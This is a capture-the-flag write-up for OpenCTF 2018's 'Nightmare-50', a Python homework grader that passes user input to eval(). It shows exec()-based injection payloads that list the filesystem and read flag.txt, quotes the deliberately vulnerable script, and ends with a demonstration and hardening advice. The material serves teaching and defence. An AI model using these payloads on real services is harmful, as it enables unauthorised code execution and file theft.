
Last active September 3, 2018 21:20
OpenCTF 2018: Challenge 24 (Nightmare-50)

Challenge text:

Nightmare-50 50 ---
Automated home work scoring my ass. 

This website hosts a 'homework grading' application as an Xterm.js/Gotty webapp:

Welcome to Doctor Professor Wilson's Python 101!
Lesson 1: hello world
Enter homework for grading:

Here we can enter a single line of Python code which turns out to be passed straight to eval(). We'll first want to explore the filesystem. The obstacle is not the single line (Python does allow several statements on one line separated by semicolons) but eval() itself: it only accepts an expression, so statements such as import or with cannot be submitted directly. The way around it is to submit a call to exec(), which is an expression as far as eval() is concerned but executes the string it is given as arbitrary statements:

exec("import os;\nprint(os.listdir('.'))")

This gives us:

['lib64', 'lib', 'sys', 'mnt', 'home', 'bin', 'var', 'usr', 'tmp', 'media', 'proc', 'boot', 'sbin', 'dev', 'run', 'opt', 'etc', 'root', 'srv', '.dockerenv', '', 'requirements.txt', 'flag.txt', '']

We assume the flag is in flag.txt and read this:

exec("with open('flag.txt', 'r') as f:\n    print(f.read())")

And this returns the flag: ThisIsAVeryFl@ggyFlag

As a bonus, we can also extract the contents of

exec("with open('', 'r') as f:\n    print(f.read())")

import sys

# Suppress tracebacks so a failed submission leaks nothing about the script
sys.tracebacklimit = 0

# Intended as a restricted namespace for eval(). It is not: '__builtins__' is
# absent, so eval() inserts the real builtins module, leaving exec(), open()
# and __import__ available; the other keys are just harmless globals.
env = dict(locals=None, globals=None, __name__=None, print=print, __file__=None)

print("Welcome to Doctor Professor Wilson's Python 101!")
print("Lesson 1: hello world")
inject = input("Enter homework for grading:\n")
eval(inject, env)  # untrusted input evaluated directly: arbitrary code execution
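As an added example (not part of the original gist), the following Python reproduces the grading script's eval() namespace and demonstrates the two facts the escape above relies on: eval() rejects statements but happily accepts a call to exec(), and a globals dict with no '__builtins__' key is silently given the real builtins module, so nothing in that dict restricts anything. The hardened_env() variant with an explicit empty __builtins__ is my own addition for contrast; the payload strings and function names are constructed for this example.

```python
# Added example: reproduces the challenge's eval() "sandbox" and the exec() trick.
import ast


def is_expression(src):
    """eval() only accepts a single expression; statements fail to parse in 'eval' mode."""
    try:
        ast.parse(src, mode="eval")
        return True
    except SyntaxError:
        return False


def challenge_env():
    """Same globals dict as the grading script. None of these keys restrict eval()."""
    return dict(locals=None, globals=None, __name__=None, print=print, __file__=None)


def hardened_env():
    """Contrast: an explicit, empty '__builtins__' removes exec/open/__import__ by name.
    This is NOT a real sandbox (see the note below), but it defeats the naive payload."""
    return {"__builtins__": {}, "print": print}


def grade(homework, env):
    """Mimic the challenge: evaluate the submission with a caller-supplied globals dict."""
    return eval(homework, env)


def builtins_leaked(env):
    """CPython inserts the real builtins module into a globals dict that lacks
    '__builtins__' the first time eval() runs with it."""
    return "__builtins__" in env


def run_exec_trick(env):
    """The writeup's trick: exec(...) is a call expression, so eval() accepts it,
    and exec() with no explicit namespaces runs its statements in the current
    scope, i.e. in `env`. Returns the value the payload stored there."""
    payload = 'exec("import os\\nSEP = os.sep")'   # constructed payload, same shape as the writeup's
    eval(payload, env)
    return env.get("SEP")


def try_payload(payload, env):
    """Report whether a payload runs or is stopped by a missing builtin name."""
    try:
        grade(payload, env)
        return "ran"
    except NameError as exc:
        return "blocked: " + str(exc)


if __name__ == "__main__":
    print("statement accepted by eval?", is_expression("import os"))
    print("exec call accepted by eval?", is_expression('exec("import os")'))
    env = challenge_env()
    print("builtins present before eval:", builtins_leaked(env))
    print("os.sep smuggled out via exec:", run_exec_trick(env))
    print("builtins present after eval: ", builtins_leaked(env))
    print("hardened env vs exec payload:", try_payload('exec("import os")', hardened_env()))
    print("hardened env vs open payload:", try_payload("open('flag.txt')", hardened_env()))
```

Two caveats a practitioner should take from this. Setting keys like locals, globals or __file__ in the dict does nothing; only a '__builtins__' entry is special to eval(). And even the hardened variant is not a sandbox: restricting builtins in CPython is well known to be bypassable through object introspection, so the real fix is to never hand untrusted input to eval() or exec() at all (use ast.literal_eval for data, or a purpose-built parser).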